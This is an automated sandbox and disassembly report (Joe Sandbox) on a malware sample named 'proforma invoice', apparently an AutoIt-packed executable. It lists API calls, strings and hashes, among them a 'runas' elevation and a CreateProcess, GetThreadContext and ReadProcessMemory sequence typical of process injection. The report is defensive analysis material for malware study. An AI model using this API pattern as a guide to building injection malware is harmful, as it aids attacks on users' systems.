                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                  • String ID: SCRIPT
                  • API String ID: 3051347437-3967369404
                  • Opcode ID: 99dd4a00ea63c583c0887f9465fb2f115afa3a45432539d44e7bde91a1a6d6b2
                  • Instruction ID: 8bf6c444e22d256abdaa87ce9ed5e7d40808dd2e5fdb70adfda83064cb1c797d
                  • Opcode Fuzzy Hash: 99dd4a00ea63c583c0887f9465fb2f115afa3a45432539d44e7bde91a1a6d6b2
                  • Instruction Fuzzy Hash: 43113075240701BFD7218BA5DC49F677BB9EBC9B51F244169B50297290DBB1D8048760

                  Control-flow Graph

                  APIs
                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00AA2B6B
                    • Part of subcall function 00AA3A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00B71418,?,00AA2E7F,?,?,?,00000000), ref: 00AA3A78
                    • Part of subcall function 00AA9CB3: _wcslen.LIBCMT ref: 00AA9CBD
                  • GetForegroundWindow.USER32(runas,?,?,?,?,?,00B62224), ref: 00AE2C10
                  • ShellExecuteW.SHELL32(00000000,?,?,00B62224), ref: 00AE2C17
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: CurrentDirectoryExecuteFileForegroundModuleNameShellWindow_wcslen
                  • String ID: runas
                  • API String ID: 448630720-4000483414
                  • Opcode ID: 422ec00042ce48409cf798f04cc5a7f8c47d96f9e22675187fa93b6a0effd464
                  • Instruction ID: 4621013bce0ad0effa53d24fa8b2c74bb7742026fa94b046e506e339cc27fc7f
                  • Opcode Fuzzy Hash: 422ec00042ce48409cf798f04cc5a7f8c47d96f9e22675187fa93b6a0effd464
                  • Instruction Fuzzy Hash: 361106321083415BCB14FF68D952ABEBBA8AB97340F04486CF086571E2CF24895A9722
                  APIs
                  • lstrlenW.KERNEL32(?,00AE5222), ref: 00B0DBCE
                  • GetFileAttributesW.KERNELBASE(?), ref: 00B0DBDD
                  • FindFirstFileW.KERNELBASE(?,?), ref: 00B0DBEE
                  • FindClose.KERNEL32(00000000), ref: 00B0DBFA
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: FileFind$AttributesCloseFirstlstrlen
                  • String ID:
                  • API String ID: 2695905019-0
                  • Opcode ID: 692ace9a3b184ea804505116e350d4cf1ff434ef2275eba92aa63e5506e90063
                  • Instruction ID: d6237e7300428a8a87ecdc320c210c98e7fd97aedb3c303d7608a06a98cbc18e
                  • Opcode Fuzzy Hash: 692ace9a3b184ea804505116e350d4cf1ff434ef2275eba92aa63e5506e90063
                  • Instruction Fuzzy Hash: FAF0A03181092057D2306FF8AC0D8AF3FACDE01334B204B42F836D20E0EFB099548A95
                  APIs
                  • GetInputState.USER32 ref: 00AAD807
                  • timeGetTime.WINMM ref: 00AADA07
                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00AADB28
                  • TranslateMessage.USER32(?), ref: 00AADB7B
                  • DispatchMessageW.USER32(?), ref: 00AADB89
                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00AADB9F
                  • Sleep.KERNEL32(0000000A), ref: 00AADBB1
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: Message$Peek$DispatchInputSleepStateTimeTranslatetime
                  • String ID:
                  • API String ID: 2189390790-0
                  • Opcode ID: 2d03f3d6fdeb1241c54e20d18cab092d41749da4c1eae51e0e191222adc64cb0
                  • Instruction ID: e41857696c4a8d12f39457467beacc43cfe63deed272693dab9764df1be60d84
                  • Opcode Fuzzy Hash: 2d03f3d6fdeb1241c54e20d18cab092d41749da4c1eae51e0e191222adc64cb0
                  • Instruction Fuzzy Hash: 4842BE30608245EFD729CF24C885BBABBF4BF46314F148959F596876E1DB70E884CB92

                  Control-flow Graph

                  APIs
                  • GetSysColorBrush.USER32(0000000F), ref: 00AA2D07
                  • RegisterClassExW.USER32(00000030), ref: 00AA2D31
                  • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00AA2D42
                  • InitCommonControlsEx.COMCTL32(?), ref: 00AA2D5F
                  • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00AA2D6F
                  • LoadIconW.USER32(000000A9), ref: 00AA2D85
                  • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00AA2D94
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                  • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                  • API String ID: 2914291525-1005189915
                  • Opcode ID: 880cba9c3566544b71ddf38cbb190c971747734949722be1a0ee45117423bf23
                  • Instruction ID: 8b4fff4dd75948aea1102ee7016bf98d3c3265bf0f0b96051fdf0ce6f642aa37
                  • Opcode Fuzzy Hash: 880cba9c3566544b71ddf38cbb190c971747734949722be1a0ee45117423bf23
                  • Instruction Fuzzy Hash: 9021D3B5911208EFDB009FE8EC49A9DBFB8FB08700F10451AEA15B72A0DBB145858FA4

                  Control-flow Graph
                  • Entry block: ae065b-ae068b (call ae042f)
                  • API blocks: ae0756-ae077c GetLastError, call acf2a3; ae0781-ae078a GetFileType; ae078c-ae07bd GetLastError, call acf2a3, CloseHandle; ae08fc-ae092f CloseHandle, call ae039a; ae0931-ae095d GetLastError, call acf2a3, call ad5333
                  • Edge listing not reproduced
                  APIs
                    • Part of subcall function 00AE039A: CreateFileW.KERNELBASE(00000000,00000000,?,00AE0704,?,?,00000000,?,00AE0704,00000000,0000000C), ref: 00AE03B7
                  • GetLastError.KERNEL32 ref: 00AE076F
                  • __dosmaperr.LIBCMT ref: 00AE0776
                  • GetFileType.KERNELBASE(00000000), ref: 00AE0782
                  • GetLastError.KERNEL32 ref: 00AE078C
                  • __dosmaperr.LIBCMT ref: 00AE0795
                  • CloseHandle.KERNEL32(00000000), ref: 00AE07B5
                  • CloseHandle.KERNEL32(?), ref: 00AE08FF
                  • GetLastError.KERNEL32 ref: 00AE0931
                  • __dosmaperr.LIBCMT ref: 00AE0938
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                  • String ID: H
                  • API String ID: 4237864984-2852464175
                  • Opcode ID: 94a2eb65954d62c599beb030bd0a2c2fda83b64a33485b594a89d3e59652cab8
                  • Instruction ID: 75c17dfb9691f72a288282ecdf673f51a4f6c8d0f6d75bdfb99d225c41814dd3
                  • Opcode Fuzzy Hash: 94a2eb65954d62c599beb030bd0a2c2fda83b64a33485b594a89d3e59652cab8
                  • Instruction Fuzzy Hash: F2A12632A141848FDF19AF68D851FAE3BB1AB06320F24015EF815EF391DB719D92CB91

                  Control-flow Graph

                  APIs
                    • Part of subcall function 00AA3A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00B71418,?,00AA2E7F,?,?,?,00000000), ref: 00AA3A78
                    • Part of subcall function 00AA3357: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00AA3379
                  • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00AA356A
                  • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00AE318D
                  • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00AE31CE
                  • RegCloseKey.ADVAPI32(?), ref: 00AE3210
                  • _wcslen.LIBCMT ref: 00AE3277
                  • _wcslen.LIBCMT ref: 00AE3286
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
                  • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                  • API String ID: 98802146-2727554177
                  • Opcode ID: ff71614d36a150185e3785e972f94f3e27de362df4adb64591ef0ff630879145
                  • Instruction ID: 9c4f4735ee4e83ee9c41021705b752b34710a44ec541037a890d6e9d19a92306
                  • Opcode Fuzzy Hash: ff71614d36a150185e3785e972f94f3e27de362df4adb64591ef0ff630879145
                  • Instruction Fuzzy Hash: F671E6724043019ED704EF65DD869ABBBF8FF99340F41082EF589971A0EF348A88CB56

                  Control-flow Graph

                  APIs
                  • GetSysColorBrush.USER32(0000000F), ref: 00AA2B8E
                  • LoadCursorW.USER32(00000000,00007F00), ref: 00AA2B9D
                  • LoadIconW.USER32(00000063), ref: 00AA2BB3
                  • LoadIconW.USER32(000000A4), ref: 00AA2BC5
                  • LoadIconW.USER32(000000A2), ref: 00AA2BD7
                  • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00AA2BEF
                  • RegisterClassExW.USER32(?), ref: 00AA2C40
                    • Part of subcall function 00AA2CD4: GetSysColorBrush.USER32(0000000F), ref: 00AA2D07
                    • Part of subcall function 00AA2CD4: RegisterClassExW.USER32(00000030), ref: 00AA2D31
                    • Part of subcall function 00AA2CD4: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00AA2D42
                    • Part of subcall function 00AA2CD4: InitCommonControlsEx.COMCTL32(?), ref: 00AA2D5F
                    • Part of subcall function 00AA2CD4: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00AA2D6F
                    • Part of subcall function 00AA2CD4: LoadIconW.USER32(000000A9), ref: 00AA2D85
                    • Part of subcall function 00AA2CD4: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00AA2D94
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                  • String ID: #$0$AutoIt v3
                  • API String ID: 423443420-4155596026
                  • Opcode ID: e56af5c8030352f32693b1880cccc3c6b779fef1ff45fa63a220676d95a907b9
                  • Instruction ID: 6745bcdea0cf355941a444524a92b67919b1e7ccf4d92175fec13c42ea5f620f
                  • Opcode Fuzzy Hash: e56af5c8030352f32693b1880cccc3c6b779fef1ff45fa63a220676d95a907b9
                  • Instruction Fuzzy Hash: 65212571A00318AFDB10DFADEC45AAD7FB4FB08B50F11041AE508A76A0DBB109848FA8

                  Control-flow Graph
                  • Entry block: aa3170-aa3185
                  • API blocks: aa31d0-aa31d8 DefWindowProcW; aa3201-aa3214 KillTimer, call aa30f2, call aa3c50; aa321d-aa3244 SetTimer, RegisterWindowMessageW; aa3246-aa3251 CreatePopupMenu; aa3265-aa326d PostQuitMessage; ae2dc6-ae2dd2 SetFocus; ae2dd7-ae2df6 MoveWindow
                  • Edge listing not reproduced
                  APIs
                  • DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,00AA316A,?,?), ref: 00AA31D8
                  • KillTimer.USER32(?,00000001,?,?,?,?,?,00AA316A,?,?), ref: 00AA3204
                  • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00AA3227
                  • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,00AA316A,?,?), ref: 00AA3232
                  • CreatePopupMenu.USER32 ref: 00AA3246
                  • PostQuitMessage.USER32(00000000), ref: 00AA3267
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                  • String ID: TaskbarCreated
                  • API String ID: 129472671-2362178303
                  • Opcode ID: 0d9eb8f0e543b359339e89409c72579c1089e402e3f90e6ef04f68319790e71f
                  • Instruction ID: ba846bb20cef8c81fe2198b1a0e060ae6452bb98a14d481ff58d05f993ca311c
                  • Opcode Fuzzy Hash: 0d9eb8f0e543b359339e89409c72579c1089e402e3f90e6ef04f68319790e71f
                  • Instruction Fuzzy Hash: 24412133240204AADF141F7C9D4ABBD3AA9EB57340F144626FA1A972E1CF618E8587B1

                  Control-flow Graph
                  • Entry block: ad8d45-ad8d55
                  • API blocks: ad8fcc-ad8fdb GetConsoleMode; ad8fe3-ad8ffd ReadConsoleW; ad8fff GetLastError; ad902d-ad9045 ReadFile; ad90a1-ad90ac GetLastError
                  • Edge listing not reproduced
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:

                  APIs
                  • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 02102701
                  • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 02102927
                  Memory Dump Source
                  • Source File: 00000000.00000002.1655323945.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2100000_proforma invoice.jbxd
                  Similarity
                  • API ID: CreateFileFreeVirtual
                  • String ID:
                  • API String ID: 204039940-0

                  APIs
                  • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00AA2C91
                  • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00AA2CB2
                  • ShowWindow.USER32(00000000,?,?,?,?,?,?,00AA1CAD,?), ref: 00AA2CC6
                  • ShowWindow.USER32(00000000,?,?,?,?,?,?,00AA1CAD,?), ref: 00AA2CCF
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: Window$CreateShow
                  • String ID: AutoIt v3$edit
                  • API String ID: 1584632944-3779509399

                  APIs
                    • Part of subcall function 021022A0: Sleep.KERNELBASE(000001F4), ref: 021022B1
                  • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 02102521
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1655323945.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2100000_proforma invoice.jbxd
                  Similarity
                  • API ID: CreateFileSleep
                  • String ID: 62W3WRBFJZENPNWJVR9WWVPG4PT
                  • API String ID: 2694422964-2720630962

                  APIs
                  • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00B12C05
                  • DeleteFileW.KERNEL32(?), ref: 00B12C87
                  • CopyFileW.KERNELBASE(?,?,00000000,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00B12C9D
                  • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00B12CAE
                  • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00B12CC0
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: File$Delete$Copy
                  • String ID:
                  • API String ID: 3226157194-0

                  APIs
                  • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,00AA3B0F,SwapMouseButtons,00000004,?), ref: 00AA3B40
                  • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,00AA3B0F,SwapMouseButtons,00000004,?), ref: 00AA3B61
                  • RegCloseKey.KERNELBASE(00000000,?,?,?,80000001,80000001,?,00AA3B0F,SwapMouseButtons,00000004,?), ref: 00AA3B83
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: CloseOpenQueryValue
                  • String ID: Control Panel\Mouse
                  • API String ID: 3677997916-824357125
                  APIs
                  • CreateProcessW.KERNELBASE(?,00000000), ref: 02101A5B
                  • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 02101AF1
                  • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 02101B13
                  Memory Dump Source
                  • Source File: 00000000.00000002.1655323945.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2100000_proforma invoice.jbxd
                  Similarity
                  • API ID: Process$ContextCreateMemoryReadThreadWow64
                  • String ID:
                  • API String ID: 2438371351-0
                  Strings
                  • Variable must be of type 'Object'., xrefs: 00AF32B7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID:
                  • String ID: Variable must be of type 'Object'.
                  • API String ID: 0-109567571
                  APIs
                  • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00AE33A2
                    • Part of subcall function 00AA6B57: _wcslen.LIBCMT ref: 00AA6B6A
                  • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00AA3A04
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: IconLoadNotifyShell_String_wcslen
                  • String ID: Line:
                  • API String ID: 2289894680-1585850449
                  APIs
                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00AC0668
                    • Part of subcall function 00AC32A4: RaiseException.KERNEL32(?,?,?,00AC068A,?,00B71444,?,?,?,?,?,?,00AC068A,00AA1129,00B68738,00AA1129), ref: 00AC3304
                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00AC0685
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: Exception@8Throw$ExceptionRaise
                  • String ID: Unknown exception
                  • API String ID: 3476068407-410509341
                  APIs
                  • GetTempPathW.KERNEL32(00000104,?,00000001), ref: 00B1302F
                  • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 00B13044
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: Temp$FileNamePath
                  • String ID: aut
                  • API String ID: 3285503233-3010740371
                  APIs
                  • GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 00B282F5
                  • TerminateProcess.KERNEL32(00000000), ref: 00B282FC
                  • FreeLibrary.KERNEL32(?,?,?,?), ref: 00B284DD
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: Process$CurrentFreeLibraryTerminate
                  • String ID:
                  • API String ID: 146820519-0
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  APIs
                    • Part of subcall function 00AA1BC3: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00AA1BF4
                    • Part of subcall function 00AA1BC3: MapVirtualKeyW.USER32(00000010,00000000), ref: 00AA1BFC
                    • Part of subcall function 00AA1BC3: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00AA1C07
                    • Part of subcall function 00AA1BC3: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00AA1C12
                    • Part of subcall function 00AA1BC3: MapVirtualKeyW.USER32(00000011,00000000), ref: 00AA1C1A
                    • Part of subcall function 00AA1BC3: MapVirtualKeyW.USER32(00000012,00000000), ref: 00AA1C22
                    • Part of subcall function 00AA1B4A: RegisterWindowMessageW.USER32(00000004,?,00AA12C4), ref: 00AA1BA2
                  • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00AA136A
                  • OleInitialize.OLE32 ref: 00AA1388
                  • CloseHandle.KERNEL32(00000000,00000000), ref: 00AE24AB
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                  • String ID:
                  • API String ID: 1986988660-0
                  APIs
                  • FindCloseChangeNotification.KERNELBASE(00000000,00000000,?,?,00AD85CC,?,00B68CC8,0000000C), ref: 00AD8704
                  • GetLastError.KERNEL32(?,00AD85CC,?,00B68CC8,0000000C), ref: 00AD870E
                  • __dosmaperr.LIBCMT ref: 00AD8739
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: ChangeCloseErrorFindLastNotification__dosmaperr
                  • String ID:
                  • API String ID: 490808831-0
                  APIs
                  • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,00000000,?,?,00B12CD4,?,?,?,00000004,00000001), ref: 00B12FF2
